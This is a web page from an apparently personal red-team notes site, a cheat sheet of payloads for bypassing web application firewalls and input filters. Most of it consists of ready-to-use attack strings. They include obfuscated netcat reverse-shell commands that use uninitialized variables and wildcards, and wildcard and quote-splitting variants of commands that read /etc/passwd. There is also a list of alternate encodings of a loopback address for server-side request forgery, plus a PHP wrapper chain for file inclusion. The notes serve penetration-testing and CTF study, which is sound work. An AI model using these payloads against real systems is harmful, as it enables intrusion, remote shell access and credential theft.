Hackers Rest
  • Hacker's Rest
  • Tools & Cheatsheets
    • Cybersecurity YouTube Channels
  • Hacking Methodology
  • Hands-on Practice
  • Fundamentals
    • Network Fundamentals
    • Computer Fundamentals
  • Unix
    • Unix Fundamentals
    • Hardening & Setup
      • TMUX/Screen Cheatsheet
    • Red Team Notes
      • Enumeration
      • Getting Access
      • Privilege Escalation
      • Pivoting/Lateral Movement
      • Data Exfiltration
      • Persistence
    • Vim
  • Windows
    • Windows Fundamentals
    • PowerShell
    • Hardening & Setup
    • Red Team Notes
      • Enumeration
      • Getting Access
      • Privilege Escalation
      • Pivoting/Lateral Movement
      • Persistence
      • Data Exfiltration
      • Active Directory
        • Enumeration
        • Getting Access
        • Privilege Escalation
        • Persistence
      • Kerberos
      • Impacket
  • MacOS
    • MacOS Basics
    • Hardening & Configuration
    • Red Team Notes
      • Enumeration
      • Getting Access
      • Privilege Escalation
      • Persistence
  • Web
    • Burp Suite
    • DNS
    • Web Notes
      • Enumeration
      • Web Filter Bypass
      • Command Injection
      • Subdomain/Virtual Host Enumeration
      • The Web Application Hacker's Handbook
  • Mobile
    • iOS
    • Android
  • OS Agnostic
    • Basic Enumeration
    • Cryptography & Encryption
    • Network Hardware
    • OS Agnostic
    • OSINT
    • Password Cracking
      • Gathering the Hashes
      • Wordlist Manipulation
      • Cracking the Hashes
    • Pivoting
      • Chisel
      • Plink.exe
      • SSH
      • Sshuttle
      • Socat
    • Reverse Engineering & Binary Exploitation
      • Buffer Overflow
    • Scripting
      • Script Language Syntax
    • SQL
    • SSH & SCP
    • Steganography
    • Wireless
  • Unsorted
Powered by GitBook
On this page
  • Payloads and Bypass Methods for Web Filtering
  • Use Uninitialized Shell Variables to Bypass Filters
  • Use Wildcards to Bypass Filters
  • Use String Concatenation to Bypass Filters
  • Convert IP Address to Other Formats
  • LFI / RFI by Bypassing Filters Using Wrappers

Was this helpful?

Edit on GitHub
  1. Web
  2. Web Notes

Web Filter Bypass

PreviousEnumerationNextCommand Injection

Last updated 4 years ago

Was this helpful?

Payloads and Bypass Methods for Web Filtering

Use Uninitialized Shell Variables to Bypass Filters

Uninitialized shell variables can be used for bypassing web application firewalls (WAF). Example: bypassing a filter to execute a reverse shell - nc$u -e /bin$u/bash$u <ip> <port>. If this doesn't work try adding spaces before and after the variable (note the +'s, this example is also URL encoded): nc+$u++-e+/bin$u/bash$u <ip> <port> ($u in this case is a random attacker-picked variable that would hopefully be uninitialized on the target).

Use Wildcards to Bypass Filters

Bypass web filters by using bash wildcards:/???/?s /?cmd=%2f???%2f??t%20%2f???%2fp??s?? will bypass...and execute every command that matches. such as /bin/cat /etc/apt, and /bin/cat /etc/passwd

netcat firewall bypass: /???/n? -e /???/b??h 2130706433 1337 (/???/?c.??????????? -e /???/b??h 2130706433 1337 for nc traditional)

Standard: /bin/nc 127.0.0.1 1337
Evasion:/???/n? 2130706433 1337
Used chars: / ? n [0-9]

Standard: /bin/cat /etc/passwd
Evasion: /???/??t /???/??ss??
Used chars: / ? t s

Use String Concatenation to Bypass Filters

$ /bin/cat /etc/passwd
$ /bin/cat /e'tc'/pa'ss'wd
$ /bin/c'at' /e'tc'/pa'ss'wd
$ /b'i'n/c'a't /e't'c/p'a's's'w'd'
Can use \\ instead of ' as well

Convert IP Address to Other Formats

It is still understood by most programs and languages when converted to other formats, such as decimal, and avoids . character in filtered HTTP requests: 127.0.0.1 = 2130706433

http://127.0.0.1

#0 Concatenation
http://127.0.1
http://127.1

#Decimal
http://2130706433

#Hexidecimal
http://0x7f000001

#Dotted Hexidecimal
http://0x7f.0x0.0x0.0x1
http://0x7f.0x000001
http://0x7f.0x0.00x0001

#Others (need descriptions)
http://0177.00.00.01
http://000000177.0000000.000000000.0001
http://017700000001
http://%31%32%37%2e%30%2e%30%2e%31
http://127.0x0.000000000.0x1
http://①②⑦.⓪.⓪.①

LFI / RFI by Bypassing Filters Using Wrappers

/zlib.deflate/read=string.rot13/convert.base64-encode/convert.iconv.utf-8.utf-16/resource=<resource to get>

Injecting IPs when . is disallowed: convert dotted-decimal format to decimal value -

From php://filter/ has multiple ways to bypass PHP input filters ;These can be chained with | or / : zip, data, expect, input, phar; many more different wrappers to try!

https://h.43z.one/ipconverter/
ip2dh
PayloadsAllTheThings
LogoGitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTFGitHub
swisskyrepo / PayloadsAllTheThings
LogoWeb Application Firewall (WAF) Evasion TechniquesMedium
Web Application Firewall (WAF) Evasion Techniques
How To Exploit PHP Remotely To Bypass Filters & WAF Rules
LogoHow To Exploit PHP RemotelySecjuice
LogoWeb Application Firewall (WAF) Evasion Techniques #3Secjuice
Web Application Firewall (WAF) Evasion Techniques #3